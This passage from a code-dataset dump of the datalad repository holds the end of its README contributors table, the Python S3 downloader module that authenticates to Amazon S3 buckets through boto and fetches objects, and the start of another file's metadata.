src=\"https://avatars3.githubusercontent.com/u/923896?v=4?s=100\" width=\"100px;\" alt=\"soichih\"/><br /><sub><b>soichih</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=soichih\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mvdoc\"><img src=\"https://avatars1.githubusercontent.com/u/6150554?v=4?s=100\" width=\"100px;\" alt=\"mvdoc\"/><br /><sub><b>mvdoc</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mvdoc\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mih\"><img src=\"https://avatars1.githubusercontent.com/u/136479?v=4?s=100\" width=\"100px;\" alt=\"mih\"/><br /><sub><b>mih</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mih\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/yarikoptic\"><img src=\"https://avatars3.githubusercontent.com/u/39889?v=4?s=100\" width=\"100px;\" alt=\"yarikoptic\"/><br /><sub><b>yarikoptic</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=yarikoptic\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/loj\"><img src=\"https://avatars2.githubusercontent.com/u/15157717?v=4?s=100\" width=\"100px;\" alt=\"loj\"/><br /><sub><b>loj</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=loj\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/feilong\"><img src=\"https://avatars2.githubusercontent.com/u/2242261?v=4?s=100\" width=\"100px;\" alt=\"feilong\"/><br /><sub><b>feilong</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=feilong\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a 
href=\"https://github.com/jhpoelen\"><img src=\"https://avatars2.githubusercontent.com/u/1084872?v=4?s=100\" width=\"100px;\" alt=\"jhpoelen\"/><br /><sub><b>jhpoelen</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jhpoelen\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/andycon\"><img src=\"https://avatars1.githubusercontent.com/u/3965889?v=4?s=100\" width=\"100px;\" alt=\"andycon\"/><br /><sub><b>andycon</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=andycon\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/nicholsn\"><img src=\"https://avatars3.githubusercontent.com/u/463344?v=4?s=100\" width=\"100px;\" alt=\"nicholsn\"/><br /><sub><b>nicholsn</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=nicholsn\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/adelavega\"><img src=\"https://avatars0.githubusercontent.com/u/2774448?v=4?s=100\" width=\"100px;\" alt=\"adelavega\"/><br /><sub><b>adelavega</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=adelavega\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/kskyten\"><img src=\"https://avatars0.githubusercontent.com/u/4163878?v=4?s=100\" width=\"100px;\" alt=\"kskyten\"/><br /><sub><b>kskyten</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=kskyten\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/TheChymera\"><img src=\"https://avatars2.githubusercontent.com/u/950524?v=4?s=100\" width=\"100px;\" alt=\"TheChymera\"/><br /><sub><b>TheChymera</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=TheChymera\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/effigies\"><img src=\"https://avatars0.githubusercontent.com/u/83442?v=4?s=100\" width=\"100px;\" alt=\"effigies\"/><br /><sub><b>effigies</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=effigies\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/jgors\"><img src=\"https://avatars1.githubusercontent.com/u/386585?v=4?s=100\" width=\"100px;\" alt=\"jgors\"/><br /><sub><b>jgors</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jgors\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/debanjum\"><img src=\"https://avatars1.githubusercontent.com/u/6413477?v=4?s=100\" width=\"100px;\" alt=\"debanjum\"/><br /><sub><b>debanjum</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=debanjum\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/nellh\"><img src=\"https://avatars3.githubusercontent.com/u/11369795?v=4?s=100\" width=\"100px;\" alt=\"nellh\"/><br /><sub><b>nellh</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=nellh\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/emdupre\"><img src=\"https://avatars3.githubusercontent.com/u/15017191?v=4?s=100\" width=\"100px;\" alt=\"emdupre\"/><br 
/><sub><b>emdupre</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=emdupre\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/aqw\"><img src=\"https://avatars0.githubusercontent.com/u/765557?v=4?s=100\" width=\"100px;\" alt=\"aqw\"/><br /><sub><b>aqw</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=aqw\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/vsoch\"><img src=\"https://avatars0.githubusercontent.com/u/814322?v=4?s=100\" width=\"100px;\" alt=\"vsoch\"/><br /><sub><b>vsoch</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=vsoch\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/kyleam\"><img src=\"https://avatars2.githubusercontent.com/u/1297788?v=4?s=100\" width=\"100px;\" alt=\"kyleam\"/><br /><sub><b>kyleam</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=kyleam\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/driusan\"><img src=\"https://avatars0.githubusercontent.com/u/498329?v=4?s=100\" width=\"100px;\" alt=\"driusan\"/><br /><sub><b>driusan</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=driusan\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/overlake333\"><img src=\"https://avatars1.githubusercontent.com/u/28018084?v=4?s=100\" width=\"100px;\" alt=\"overlake333\"/><br /><sub><b>overlake333</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=overlake333\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/akeshavan\"><img src=\"https://avatars0.githubusercontent.com/u/972008?v=4?s=100\" width=\"100px;\" alt=\"akeshavan\"/><br /><sub><b>akeshavan</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=akeshavan\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/jwodder\"><img src=\"https://avatars1.githubusercontent.com/u/98207?v=4?s=100\" width=\"100px;\" alt=\"jwodder\"/><br /><sub><b>jwodder</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jwodder\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/bpoldrack\"><img src=\"https://avatars2.githubusercontent.com/u/10498301?v=4?s=100\" width=\"100px;\" alt=\"bpoldrack\"/><br /><sub><b>bpoldrack</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=bpoldrack\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/yetanothertestuser\"><img src=\"https://avatars0.githubusercontent.com/u/19335420?v=4?s=100\" width=\"100px;\" alt=\"yetanothertestuser\"/><br /><sub><b>yetanothertestuser</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=yetanothertestuser\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/christian-monch\"><img src=\"https://avatars.githubusercontent.com/u/17925232?v=4?s=100\" width=\"100px;\" alt=\"Christian Mönch\"/><br /><sub><b>Christian Mönch</b></sub></a><br /><a 
href=\"https://github.com/datalad/datalad/commits?author=christian-monch\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mattcieslak\"><img src=\"https://avatars.githubusercontent.com/u/170026?v=4?s=100\" width=\"100px;\" alt=\"Matt Cieslak\"/><br /><sub><b>Matt Cieslak</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mattcieslak\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mikapfl\"><img src=\"https://avatars.githubusercontent.com/u/7226087?v=4?s=100\" width=\"100px;\" alt=\"Mika Pflüger\"/><br /><sub><b>Mika Pflüger</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mikapfl\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://me.ypid.de/\"><img src=\"https://avatars.githubusercontent.com/u/1301158?v=4?s=100\" width=\"100px;\" alt=\"Robin Schneider\"/><br /><sub><b>Robin Schneider</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=ypid\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://orcid.org/0000-0003-4652-3758\"><img src=\"https://avatars.githubusercontent.com/u/7570456?v=4?s=100\" width=\"100px;\" alt=\"Sin Kim\"/><br /><sub><b>Sin Kim</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=kimsin98\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/DisasterMo\"><img src=\"https://avatars.githubusercontent.com/u/49207524?v=4?s=100\" width=\"100px;\" alt=\"Michael Burgardt\"/><br /><sub><b>Michael Burgardt</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=DisasterMo\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://remi-gau.github.io/\"><img src=\"https://avatars.githubusercontent.com/u/6961185?v=4?s=100\" width=\"100px;\" alt=\"Remi Gau\"/><br /><sub><b>Remi Gau</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=Remi-Gau\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/mslw\"><img src=\"https://avatars.githubusercontent.com/u/11985212?v=4?s=100\" width=\"100px;\" alt=\"Michał Szczepanik\"/><br /><sub><b>Michał Szczepanik</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=mslw\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/bpinsard\"><img src=\"https://avatars.githubusercontent.com/u/1155388?v=4?s=100\" width=\"100px;\" alt=\"Basile\"/><br /><sub><b>Basile</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=bpinsard\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/taylols\"><img src=\"https://avatars.githubusercontent.com/u/28018084?v=4?s=100\" width=\"100px;\" alt=\"Taylor Olson\"/><br /><sub><b>Taylor Olson</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=taylols\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://jdkent.github.io/\"><img src=\"https://avatars.githubusercontent.com/u/12564882?v=4?s=100\" width=\"100px;\" alt=\"James Kent\"/><br /><sub><b>James Kent</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jdkent\" 
title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/xgui3783\"><img src=\"https://avatars.githubusercontent.com/u/19381783?v=4?s=100\" width=\"100px;\" alt=\"xgui3783\"/><br /><sub><b>xgui3783</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=xgui3783\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/tstoeter\"><img src=\"https://avatars.githubusercontent.com/u/4901704?v=4?s=100\" width=\"100px;\" alt=\"tstoeter\"/><br /><sub><b>tstoeter</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=tstoeter\" title=\"Code\">💻</a></td>\n </tr>\n <tr>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://jsheunis.github.io/\"><img src=\"https://avatars.githubusercontent.com/u/10141237?v=4?s=100\" width=\"100px;\" alt=\"Stephan Heunis\"/><br /><sub><b>Stephan Heunis</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=jsheunis\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://www.mmmccormick.com\"><img src=\"https://avatars.githubusercontent.com/u/25432?v=4?s=100\" width=\"100px;\" alt=\"Matt McCormick\"/><br /><sub><b>Matt McCormick</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=thewtex\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/vickychenglau\"><img src=\"https://avatars.githubusercontent.com/u/22065437?v=4?s=100\" width=\"100px;\" alt=\"Vicky C Lau\"/><br /><sub><b>Vicky C Lau</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=vickychenglau\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://chris-lamb.co.uk\"><img src=\"https://avatars.githubusercontent.com/u/133209?v=4?s=100\" width=\"100px;\" alt=\"Chris Lamb\"/><br /><sub><b>Chris Lamb</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=lamby\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/asmacdo\"><img src=\"https://avatars.githubusercontent.com/u/1028657?v=4?s=100\" width=\"100px;\" alt=\"Austin Macdonald\"/><br /><sub><b>Austin Macdonald</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=asmacdo\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://nobodyinperson.de\"><img src=\"https://avatars.githubusercontent.com/u/19148271?v=4?s=100\" width=\"100px;\" alt=\"Yann Büchau\"/><br /><sub><b>Yann Büchau</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=nobodyinperson\" title=\"Code\">💻</a></td>\n <td align=\"center\" valign=\"top\" width=\"14.28%\"><a href=\"https://github.com/matrss\"><img src=\"https://avatars.githubusercontent.com/u/9308656?v=4?s=100\" width=\"100px;\" alt=\"Matthias Riße\"/><br /><sub><b>Matthias Riße</b></sub></a><br /><a href=\"https://github.com/datalad/datalad/commits?author=matrss\" title=\"Code\">💻</a></td>\n </tr>\n </tbody>\n</table>\n\n<!-- markdownlint-restore -->\n<!-- prettier-ignore-end -->\n\n<!-- ALL-CONTRIBUTORS-LIST:END -->\n\n[![macstadium](https://uploads-ssl.webflow.com/5ac3c046c82724970fc60918/5c019d917bba312af7553b49_MacStadium-developerlogo.png)](https://www.macstadium.com/)\n\n[Git]: https://git-scm.com\n[Git-annex]: http://git-annex.branchable.com\n[setup.py]: 
https://github.com/datalad/datalad/blob/master/setup.py\n[NeuroDebian]: http://neuro.debian.net\n[Package Manager Specification]: https://projects.gentoo.org/pms/latest/pms.html\n[enabling the ::science overlay]: https://github.com/gentoo/sci#manual-install-\n\n[DataLad Handbook: Installation]: http://handbook.datalad.org/en/latest/intro/installation.html\n" }, { "alpha_fraction": 0.5682237148284912, "alphanum_fraction": 0.5784879922866821, "avg_line_length": 37.738094329833984, "blob_id": "6ee12bc16733bf13628cfd7f571591b6b4e41595", "content_id": "0258590ae333bb72e71c0375eb64dbe163e0e820", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16270, "license_type": "permissive", "max_line_length": 119, "num_lines": 420, "path": "/datalad/downloaders/s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provide access to Amazon S3 objects.\n\"\"\"\n\nimport re\n\nfrom urllib.parse import urlsplit, unquote as urlunquote\n\nfrom ..utils import (\n auto_repr,\n ensure_dict_from_str,\n)\nfrom ..dochelpers import (\n borrowkwargs,\n)\nfrom ..support.network import (\n get_url_straight_filename,\n iso8601_to_epoch,\n rfc2822_to_epoch,\n)\n\nfrom .base import Authenticator\nfrom .base import BaseDownloader, DownloaderSession\nfrom ..support.exceptions import (\n AccessPermissionExpiredError,\n CapturedException,\n TargetFileAbsent,\n)\nfrom ..support.s3 import (\n Key,\n OrdinaryCallingFormat,\n S3ResponseError,\n boto,\n get_bucket,\n try_multiple_dec_s3,\n)\nfrom ..support.status import FileStatus\n\nimport logging\nfrom logging import getLogger\nlgr = getLogger('datalad.s3')\nboto_lgr = logging.getLogger('boto')\n# not in effect at all, probably those are setup later\n#boto_lgr.handlers = lgr.handlers # Use our handlers\n\n__docformat__ = 'restructuredtext'\n\n\n@auto_repr\nclass S3Authenticator(Authenticator):\n \"\"\"Authenticator for S3 AWS\n \"\"\"\n allows_anonymous = True\n DEFAULT_CREDENTIAL_TYPE = 'aws-s3'\n\n def __init__(self, *args, host=None, **kwargs):\n \"\"\"\n\n Parameters\n ----------\n host: str, optional\n In some cases it is necessary to provide host to connect to. 
Passed\n to boto.connect_s3\n \"\"\"\n super(S3Authenticator, self).__init__(*args, **kwargs)\n self.connection = None\n self.bucket = None\n self._conn_kwargs = {}\n if host:\n self._conn_kwargs['host'] = host\n\n def authenticate(self, bucket_name, credential, cache=True):\n \"\"\"Authenticates to the specified bucket using provided credentials\n\n Returns\n -------\n bucket\n \"\"\"\n\n if not boto:\n raise RuntimeError(\"%s requires boto module which is N/A\" % self)\n\n # Shut up boto if we do not care to listen ;)\n boto_lgr.setLevel(\n logging.CRITICAL\n if lgr.getEffectiveLevel() > 1\n else logging.DEBUG\n )\n\n # credential might contain 'session' token as well\n # which could be provided as security_token=<token>.,\n # see http://stackoverflow.com/questions/7673840/is-there-a-way-to-create-a-s3-connection-with-a-sessions-token\n conn_kwargs = self._conn_kwargs.copy()\n if bucket_name.lower() != bucket_name:\n # per http://stackoverflow.com/a/19089045/1265472\n conn_kwargs['calling_format'] = OrdinaryCallingFormat()\n\n if credential is not None:\n credentials = credential()\n conn_kind = \"with authentication\"\n conn_args = [credentials['key_id'], credentials['secret_id']]\n conn_kwargs['security_token'] = credentials.get('session')\n else:\n conn_kind = \"anonymously\"\n conn_args = []\n conn_kwargs['anon'] = True\n if '.' in bucket_name:\n conn_kwargs['calling_format'] = OrdinaryCallingFormat()\n\n lgr.info(\n \"S3 session: Connecting to the bucket %s %s\", bucket_name, conn_kind\n )\n self.connection = conn = boto.connect_s3(*conn_args, **conn_kwargs)\n self.bucket = bucket = get_bucket(conn, bucket_name)\n return bucket\n\n\n@auto_repr\nclass S3DownloaderSession(DownloaderSession):\n def __init__(self, size=None, filename=None, url=None, headers=None,\n key=None):\n super(S3DownloaderSession, self).__init__(\n size=size, filename=filename, headers=headers, url=url\n )\n self.key = key\n\n def download(self, f=None, pbar=None, size=None):\n # S3 specific (the rest is common with e.g. http)\n def pbar_callback(downloaded, totalsize):\n assert (totalsize == self.key.size)\n if pbar:\n try:\n pbar.update(downloaded)\n except: # MIH: what does it do? MemoryError?\n pass # do not let pbar spoil our fun\n\n headers = {}\n # report for every % for files > 10MB, otherwise every 10%\n kwargs = dict(headers=headers, cb=pbar_callback,\n num_cb=100 if self.key.size > 10*(1024**2) else 10)\n if size:\n headers['Range'] = 'bytes=0-%d' % (size - 1)\n if f:\n # TODO: May be we could use If-Modified-Since\n # see http://docs.aws.amazon.com/AmazonS3/latest/API/RESTObjectGET.html\n self.key.get_contents_to_file(f, **kwargs)\n else:\n return self.key.get_contents_as_string(encoding=None, **kwargs)\n\n\n@auto_repr\nclass S3Downloader(BaseDownloader):\n \"\"\"Downloader from AWS S3 buckets\n \"\"\"\n\n _DEFAULT_AUTHENTICATOR = S3Authenticator\n\n @borrowkwargs(BaseDownloader)\n def __init__(self, **kwargs):\n super(S3Downloader, self).__init__(**kwargs)\n self._bucket = None\n\n @property\n def bucket(self):\n return self._bucket\n\n def reset(self):\n self._bucket = None\n\n @classmethod\n def _parse_url(cls, url, bucket_only=False):\n \"\"\"Parses s3:// url and returns bucket name, prefix, additional query elements\n as a dict (such as VersionId)\"\"\"\n rec = urlsplit(url)\n if bucket_only:\n return rec.netloc\n assert(rec.scheme == 's3')\n # We are often working with urlencoded URLs so we could safely interact\n # with git-annex via its text based protocol etc. 
So, if URL looks like\n # it was urlencoded the filepath, we should revert back to an original key\n # name. Since we did not demarcate whether it was urlencoded, we will do\n # magical check, which would fail if someone had % followed by two digits\n filepath = rec.path.lstrip('/')\n if re.search('%[0-9a-fA-F]{2}', filepath):\n lgr.debug(\"URL unquoting S3 URL filepath %s\", filepath)\n filepath = urlunquote(filepath)\n # TODO: needs replacement to ensure_ since it doesn't\n # deal with non key=value\n return rec.netloc, filepath, ensure_dict_from_str(rec.query, sep='&') or {}\n\n def _establish_session(self, url, allow_old=True):\n \"\"\"\n\n Parameters\n ----------\n allow_old: bool, optional\n If a Downloader allows for persistent sessions by some means -- flag\n instructs whether to use previous session, or establish a new one\n\n Returns\n -------\n bool\n To state if old instance of a session/authentication was used\n \"\"\"\n bucket_name = self._parse_url(url, bucket_only=True)\n if allow_old and self._bucket:\n if self._bucket.name == bucket_name:\n try:\n self._check_credential()\n lgr.debug(\n \"S3 session: Reusing previous connection to bucket %s\",\n bucket_name\n )\n return True # we used old\n except AccessPermissionExpiredError:\n lgr.debug(\"S3 session: credential expired\")\n else:\n lgr.warning(\"No support yet for multiple buckets per S3Downloader\")\n\n lgr.debug(\"S3 session: Reconnecting to the bucket\")\n self._bucket = try_multiple_dec_s3(self.authenticator.authenticate)(\n bucket_name, self.credential)\n return False\n\n def _check_credential(self):\n \"\"\"Quick check of the credential if known on either it has not expired\n\n Raises\n ------\n AccessPermissionExpiredError\n if credential is found to be expired\n \"\"\"\n if self.credential and self.credential.is_expired:\n raise AccessPermissionExpiredError(\n \"Credential %s has expired\" % self.credential)\n\n def _get_key(self, key_name, version_id=None, headers=None):\n try:\n return self._bucket.get_key(key_name, version_id=version_id, headers=headers)\n except S3ResponseError as e:\n if e.status != 400:\n raise # we will not deal with those here\n # e.g. 400 Bad request could happen due to timed out key.\n # Since likely things went bad if credential expired, just raise general\n # AccessDeniedError. Logic upstream should retry\n self._check_credential()\n ce1 = CapturedException(e)\n lgr.debug(\"bucket.get_key (HEAD) failed with %s, trying GET request now\",\n ce1)\n try:\n return self._get_key_via_get(key_name, version_id=version_id, headers=headers)\n except S3ResponseError:\n # propagate S3 exceptions since they actually can provide the reason why we failed!\n raise\n except Exception as e2:\n ce2 = CapturedException(e2)\n lgr.debug(\"We failed to get a key via HEAD due to %s and then via partial GET due to %s\",\n ce1, ce2)\n # reraise original one\n raise e\n\n def _get_key_via_get(self, key_name, version_id=None, headers=None):\n \"\"\"Get key information via GET so we can get error_code if any\n\n The problem with bucket.get_key is that it uses HEAD request.\n With that request response header has only the status (e.g. 400)\n but not a specific error_code. That makes it impossible to properly\n react on failed requests (wait? 
re-auth?).\n\n Yarik found no easy way in boto to reissue the request with GET,\n so this code is lobotomized version of _get_key_internal but with GET\n instead of HEAD and thus providing body into error handling.\n \"\"\"\n query_args_l = []\n if version_id:\n query_args_l.append('versionId=%s' % version_id)\n query_args = '&'.join(query_args_l) or None\n bucket = self._bucket\n headers = headers or {}\n headers['Range'] = 'bytes=0-0'\n response = bucket.connection.make_request(\n 'GET',\n bucket.name,\n key_name,\n headers=headers,\n query_args=query_args)\n body = response.read()\n if response.status // 100 == 2:\n # it was all good\n k = bucket.key_class(bucket)\n provider = bucket.connection.provider\n k.metadata = boto.utils.get_aws_metadata(response.msg, provider)\n for field in Key.base_fields:\n k.__dict__[field.lower().replace('-', '_')] = \\\n response.getheader(field)\n crange, crange_size = response.getheader('content-range'), None\n if crange:\n # should look like 'bytes 0-0/50993'\n if not crange.startswith('bytes 0-0/'):\n # we will just spit out original exception and be done -- we have tried!\n raise ValueError(\"Got content-range %s which I do not know how to handle to \"\n \"get the full size\" % repr(crange))\n crange_size = int(crange.split('/', 1)[-1])\n k.size = crange_size\n # the following machinations are a workaround to the fact that\n # apache/fastcgi omits the content-length header on HEAD\n # requests when the content-length is zero.\n # See http://goo.gl/0Tdax for more details.\n if response.status != 206: # partial content\n # assume full return of 0 bytes etc\n clen_size = int(response.getheader('content-length'), 0)\n\n if crange_size is not None:\n if crange_size != clen_size:\n raise ValueError(\n \"We got content-length %d and size from content-range %d - they do \"\n \"not match\", clen_size, crange_size)\n k.size = clen_size\n k.name = key_name\n k.handle_version_headers(response)\n k.handle_encryption_headers(response)\n k.handle_restore_headers(response)\n k.handle_storage_class_header(response)\n k.handle_addl_headers(response.getheaders())\n return k\n else:\n if response.status == 404:\n return None\n else:\n raise bucket.connection.provider.storage_response_error(\n response.status, response.reason, body)\n\n def get_downloader_session(self, url, **kwargs):\n bucket_name, url_filepath, params = self._parse_url(url)\n if params:\n newkeys = set(params.keys()) - {'versionId'}\n if newkeys:\n raise NotImplementedError(\"Did not implement support for %s\" % newkeys)\n assert(self._bucket.name == bucket_name) # must be the same\n\n self._check_credential()\n try:\n key = try_multiple_dec_s3(self._get_key)(\n url_filepath, version_id=params.get('versionId', None)\n )\n except S3ResponseError as e:\n raise TargetFileAbsent(\"S3 refused to provide the key for %s from url %s\"\n % (url_filepath, url)) from e\n if key is None:\n raise TargetFileAbsent(\"No key returned for %s from url %s\" % (url_filepath, url))\n\n target_size = key.size # S3 specific\n headers = {\n 'Content-Length': key.size,\n 'Content-Disposition': key.name\n }\n\n if key.last_modified:\n headers['Last-Modified'] = rfc2822_to_epoch(key.last_modified)\n\n # Consult about filename\n url_filename = get_url_straight_filename(url)\n\n if 'versionId' not in params and key.version_id:\n # boto adds version_id to the request if it is known present.\n # It is a good idea in general to avoid race between moment of retrieving\n # the key information and actual download.\n # But depending on 
permissions, we might be unable (like in the case with NDA)\n # to download a guaranteed version of the key.\n # So we will just download the latest version (if still there)\n # if no versionId was specified in URL\n # Alternative would be to make this a generator and generate sessions\n # but also remember if the first download succeeded so we do not try\n # again to get versioned one first.\n key.version_id = None\n # TODO: ask NDA to allow download of specific versionId?\n\n return S3DownloaderSession(\n size=target_size,\n filename=url_filename,\n url=url,\n headers=headers,\n key=key\n )\n\n @classmethod\n def get_key_headers(cls, key, dateformat='rfc2822'):\n headers = {\n 'Content-Length': key.size,\n 'Content-Disposition': key.name\n }\n\n if key.last_modified:\n # boto would return time string the way amazon returns which returns\n # it in two different ones depending on how key information was obtained:\n # https://github.com/boto/boto/issues/466\n headers['Last-Modified'] = {'rfc2822': rfc2822_to_epoch,\n 'iso8601': iso8601_to_epoch}[dateformat](key.last_modified)\n return headers\n\n @classmethod\n def get_status_from_headers(cls, headers):\n # TODO: duplicated with http functionality\n # convert to FileStatus\n return FileStatus(\n size=headers.get('Content-Length'),\n mtime=headers.get('Last-Modified'),\n filename=headers.get('Content-Disposition')\n )\n\n @classmethod\n def get_key_status(cls, key, dateformat='rfc2822'):\n return cls.get_status_from_headers(cls.get_key_headers(key, dateformat=dateformat))\n" }, { "alpha_fraction": 0.5736953616142273, "alphanum_fraction": 0.5755224823951721, "avg_line_length": 39.409324645996094, "blob_id": "6e6370a565485c14235ce1f1db377ac36e917364", "content_id": "15ccd2df63a02826a8df71fd564a4b70cc3a1f44", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31196, "license_type": "permissive", "max_line_length": 92, "num_lines": 772, "path": "/datalad/distributed/create_sibling_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 